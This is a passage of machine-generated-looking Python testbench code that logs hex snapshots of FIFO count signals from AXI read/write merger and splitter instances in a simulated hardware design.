logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge9.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge9.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge9.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge9.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge9.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge9.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge9.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge9.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge9.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge9.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split0.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split0.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split0.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split0.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split0.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split0.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split0.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split0.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split0.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split0.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split0.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split0.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split0.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split1.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split1.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split1.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split1.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split1.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split1.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split1.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split1.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split1.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split1.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split1.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split1.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split10.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split10.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split10.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split10.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split10.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split10.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split10.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split10.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split10.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split10.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split10.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split10.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split100.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split100.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split100.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split100.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split100.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split100.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split100.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split100.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split100.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split100.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split100.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split100.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split101.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split101.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split101.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split101.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split101.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split101.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split101.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split101.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split101.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split101.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split101.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split101.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split102.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split102.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split102.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split102.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split102.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split102.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split102.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split102.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split102.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split102.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split102.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split102.axi_wr_4_splitter.order_fifo.next_count"))
